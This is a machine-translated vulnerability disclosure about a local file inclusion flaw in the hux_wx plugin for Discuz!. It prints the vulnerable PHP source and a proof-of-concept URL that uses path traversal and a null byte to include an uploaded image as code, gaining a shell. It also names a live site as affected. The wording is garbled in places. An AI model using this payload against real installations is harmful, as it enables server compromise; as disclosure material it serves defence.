Discuz! Any file contained in the front-end of the Public Platform Plug-in can be directly shell
Discuz! The front-end file of the plug-in can be directly included in the shell. The result of the dz plug-in center's main site was intercepted by the hateful Baidu cloud, but there are still potential problems.
Discuz! The front-end file of the Public Platform Plug-in is included. You can directly view the code using shell.
Hux_wx.inc.php:
<?phpif(!defined('IN_DISCUZ')) {exit('Access Denied');}$wxsetting = $_G['cache']['plugin']['hux_wx'];$paymoney = "extcredits".$wxsetting['money'];$paymoneyname = $_G['setting']['extcredits'][$wxsetting['money']]['title'];$mycash = C::t('#hux_wx#hux_common_member_count')->result_by_uid($_GET['uid'],$paymoney);$user_cm = C::t('#hux_wx#hux_common_member')->fetch_by_uid($_GET['uid'],'groupid');$gp = unserialize($wxsetting['gp']);$postgp = unserialize($wxsetting['postgp']);$appconfigsql = C::t('#hux_wx#hux_wx_config')->fetch_by_appid($_GET['mod'],'configs');if ($appconfigsql) {$appconfigs = explode('||',$appconfigsql['configs']);foreach($appconfigs as $value){ $appconfigss = explode(':',$value);$appconfig[$appconfigss[0]] = $appconfigss[1];}}echo "gpc is ".get_magic_quotes_gpc()."<br>";echo DISCUZ_ROOT.'./source/plugin/hux_wx/mod/'.$_GET['mod'].'/'.$_GET['ac'].'.php';include DISCUZ_ROOT.'./source/plugin/hux_wx/mod/'.$_GET['mod'].'/'.$_GET['ac'].'.php';?></code>
Here, we print out that we have enabled this function.
Then we first visit the url:
Http: // localhost/Discuz_X3.2_ SC _UTF8/upload/plugin. php? Id = hux_wx: hux_wx & uid = 1 & mod =.../& ac = data/attachment/album/201410/15/181713m2a8nnnzjv2i52n6.png % 00
After the results are displayed, let's take a look at how the image was transmitted and how it was found.
What do not say, we directly look at the plug-in center of the main station: http://www.hux.cc
This is the first homepage, which indicates the importance of status.
In addition, this site has the function of uploading and editing albums.
Solution:
Filter